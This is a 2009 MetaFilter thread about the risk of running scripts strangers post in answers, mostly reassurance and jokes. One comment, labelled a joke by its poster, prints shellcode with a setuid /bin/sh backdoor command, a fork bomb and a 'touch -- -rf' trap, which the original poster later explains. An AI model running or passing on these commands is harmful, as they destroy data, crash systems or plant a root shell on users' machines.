Folk around here trust each other, do they? September 12, 2009 10:06 PM   Subscribe

Let me know if this is the wrong forum, but in this AskMeFi thread the OP apparently executed a script someone wrote him. Judging from one of this follow-up comments, he had no knowledge of Windows batch files. I'm a little disturbed. Am I paranoid?
posted by d. z. wang to Etiquette/Policy at 10:06 PM (35 comments total)

I'm not sure why you should be disturbed. I mean sure someone could have potentially done something malicious, but it would be the last thing they'd ever do on MetaFilter.
posted by jessamyn (staff) at 10:13 PM on September 12, 2009 [1 favorite]


Hm. My thoughts on this are two-fold. First, people need to be intelligent in their browsing habits here, as they should be anywhere, and be careful of potentially harmful things whether it's a suspicious link or, like in this case, some solicited code. Second, the community polices itself pretty well in regards to this sort of thing and malicious code or links would get called out pretty quickly, I bet - I've seen it done in the past.

So I guess you're not paranoid, but I also don't think you should be disturbed.
posted by empyrean at 10:19 PM on September 12, 2009


My experience with AskMe suggests that other people would be very quick to a) flag and b) comment if such a thing were outright misleading, let alone malicious.
posted by djgh at 10:21 PM on September 12, 2009 [3 favorites]


You don't need to know much about batch files to see that these scripts are as advertised.
posted by The Light Fantastic at 10:31 PM on September 12, 2009 [2 favorites]


Though it is easy to type these things wrong and potentially destroy data. I myself destroyed my test data as I was trying to get my version working. Always backup your data before operating on it.
posted by jeffamaphone at 10:46 PM on September 12, 2009


Yeah, nothing disturbing about it. Since the code is basically printed as is right on the page, there's no hiding anything: if someone saw something suspicious they would have brought it to a mod's attention as soon as possible.

I see where your concern is, though. If no one paid attention to that thread, and he ran a script that formatted his drive, that would be a Really Bad Thing™. But then there's the whole "Don't do stuff to your computer if you don't know what it does", etc. So let's just leave it at that.
posted by Askiba at 10:51 PM on September 12, 2009




The more visible code is, the less risk you take by running it. A plaintext batch file like that, posted in public where hundreds or thousands of people can see it, is a very low risk indeed.

If the code were obfuscated in some way, or not publicly accessible, you'd be smart to read it carefully before running it. Batch files can potentially be dangerous, but typically they need to be pretty complex to do more than simple mischief. As long as it looks safe, it almost certainly is.

Defaulting to paranoia is not a bad idea, and will overall serve you well on the Internet, but in this specific case, there's no danger.
posted by Malor at 11:54 PM on September 12, 2009 [1 favorite]


Like everybody said, since it's just a script, and not a binary executable, there's very little potential for malicious action: even if the intended user was clueless, other people would see it. I would be more worried about the subliminal messages in the FNORD comments myself.
posted by Dr Dracator at 12:02 AM on September 13, 2009


What is the problem here? Those are adults with domain knowledge sharing ideas in a totally transparent scripting language. I've posted many Python examples and even pointed people to code I have written. If any of it were malicious, I would not have an account any longer. If you run shit you found on the internet without understanding it, there is some inherent risk, but it's pretty bleeding obvious that the parties involved know what they're doing enough to assess that risk. Do you also worry someone will ruin their love life when they they get a DTMFA response to relationship questions?

I promise you that if this code had something nasty in it or was obfuscated to the point where you couldn't tell one way or the other, it wouldn't last very long.
posted by cj_ at 12:08 AM on September 13, 2009


This is a very security conscious community. We don't even allow images, cause anytime you see an image on a web page, it can hack you. True story.
posted by 31d1 at 12:29 AM on September 13, 2009 [2 favorites]


As long as you didn't flinch that time I told someone with an electrical question to attach to black wire to a copper pipe near their shower for proper grounding, or the time I explained that as long as the gas tank was absolutely full, then it was OK to weld up the leak, or all those times I said, "Yeah, I'd eat it" on AskMeFi, I'd say you're not paranoid enough!
posted by Kid Charlemagne at 12:33 AM on September 13, 2009


If you think that's bad, you should C1ALIS see the drivers I installed earlier this week on FREE VI4GRA someone's suggestion. But nothing bad HOT BAB3S came of that, so I don't see a problem here.
posted by 0xFCAF at 1:36 AM on September 13, 2009


Come on baby,
Don't fear the reaper
Take AskMe's hand,
Don't fear the reaper
We'll all teach you to fly,
Don't fear the reaper
posted by mrmojoflying at 5:35 AM on September 13, 2009


31d1 - that's because images broadcast your IP address...
posted by russm at 5:57 AM on September 13, 2009


Don't worry! Just go in to your terminal and copy/paste:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

That will protect your computer from malicious commands, if not, copy/paste this: ":(){:|:&};:" then get a rare earth magnet and place it on the top (NOT THE BOTTOM!) of your hard drive and that will protect it as well, but on a hardware level, which is good. You should probably do both of these if you get the chance

If you send me your Social Security number and a bank account number I can just remote desktop your computer and set up a basic firewall that will protect your computer.

BUT SERIOUSLY FOLKS DON'T DO THESE THINGS I JUST SAID THEY ARE AN EXAMPLE OF MALICIOUS COMMANDS
posted by fuq at 8:56 AM on September 13, 2009 [1 favorite]


touch -- -rf \*
posted by flabdablet at 9:46 AM on September 13, 2009


Pressing ALT+F4 highlights any potentially malicious scripts in Firefox.
posted by fire&wings at 10:43 AM on September 13, 2009 [1 favorite]


If you have questions, type "/q" -- that's all I know.
posted by not_on_display at 11:05 AM on September 13, 2009


Fuq's shellscript there is a very good example of what I meant by 'not running obfuscated code'. :-)
posted by Malor at 12:06 PM on September 13, 2009


Always format c:
Never format c:

Just always format b:
posted by jpdoane at 1:52 PM on September 13, 2009


Crap.

Always format b:, that is

(I fail at MetaTalk. When do we get that new comment editing system?)
posted by jpdoane at 1:55 PM on September 13, 2009


It's better the way you typed it. Poetic, even.
posted by ook at 7:46 PM on September 13, 2009


The drive that can be formatted is not the true drive.
posted by nebulawindphone at 9:29 PM on September 13, 2009


I'm pinging your local loopback from within right this moment.
posted by Burhanistan at 10:12 PM on September 13, 2009


Do you geeks even know how chilling your little musings sound to regular people? It's like listening to Pol Pot and Himmler talk shop.
posted by Methylviolet at 11:11 PM on September 13, 2009 [1 favorite]


Do you geeks even know how chilling your little musings sound to regular people? It's like listening to Pol Pot and Himmler talk shop.

Only if you're a bit.
posted by The Light Fantastic at 11:33 PM on September 13, 2009


Do you geeks even know how chilling your little musings sound to regular people?

Having no wish to chill regular people, I suppose I should present the antidote to my little musing above.

touch -- --version

posted by flabdablet at 11:41 PM on September 13, 2009


There was an AskMe question once about looking for a productivity app that I had coincidentally already written for myself. A few people asked me about it via MeMail and I emailed them the program (a standard Windows binary). Then I stole their credit card numbers and bought a new stereo system! Win for everyone involved.
posted by burnmp3s at 6:56 AM on September 14, 2009


hey burnmp3s, can I have a copy of your program (really)? Also, you should put it up on sourceforge or something and add a link on your user page.
posted by jacalata at 9:04 AM on September 14, 2009


Can I have a copy of the credit card numbers?
posted by owtytrof at 10:08 AM on September 14, 2009


I'd like a signed 8x10 if possible.
posted by ODiV at 11:21 AM on September 14, 2009


My original question is quite settled. But now, at risk of derail, could fuq, flabdablet, and fire&wings, and not_on_display explain / review my explanations of their jokes?

The touch creates files named '-rf' and '*' which will be shell-expanded into later commands and interpreted as options. Probably to make 'rm *' into 'rm -rf *', although I'd argue that if you're typing 'rm *' and relying on the write-protection to save the files you want, you're kind of asking for it.

The :(){:|:&};: is a forkbomb.

/q closes the IRC client with which I was about the ask the question, and similarly ALT-F4 closes firefox.

The hex business I had to Google, but apparently it translates to 'rm -rf ~ / &'. Although what I'm assigning into is still a mystery:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */

So that's an array of char's named "__attribute__((section(".text")))" ? Is this a variable the compiler will write verbatim into the .text section of the binary?
posted by d. z. wang at 12:51 AM on September 15, 2009


You got mine.

Also, touch -- --version creates a file called --version in the current directory. If you're still in that directory when you use any command with * as an argument, one of the filenames expanded into the command line will be --version, which most Gnu tools will interpret as an instruction to show you their version number instead of doing whatever else they do. So if you have a --version file as well as a -rf file, nothing bad will happen to you when you carelessly try to remove the pesky-looking * file. Hence, antidote.

Gets a little annoying when you do want to do something with all files in the current directory, though :-)
posted by flabdablet at 2:19 AM on September 15, 2009


flabdablet- Subtle. Evil. I like it.

Agreeing- knowledge is not dangerous. If someone says "how do I format my hard drive" and you give them instructions, and then they ask "where are all my pictures, I thought formatiing would fix my problems", that's on them. It is not the fault of the speaker when they tell someone HOW to do something if the listener doesn't know what they are doing. You'd have to be a complete moron to run code you didn't understand.

On the other hand, I keep forgetting that computers are magic, and are supposed to do what you want them to do, not what you tell them to do.
posted by gjc at 6:19 PM on September 16, 2009


« Older Oregon 'Cross   |   Search results including number of comments? Newer »

You are not logged in, either login or create an account to post comments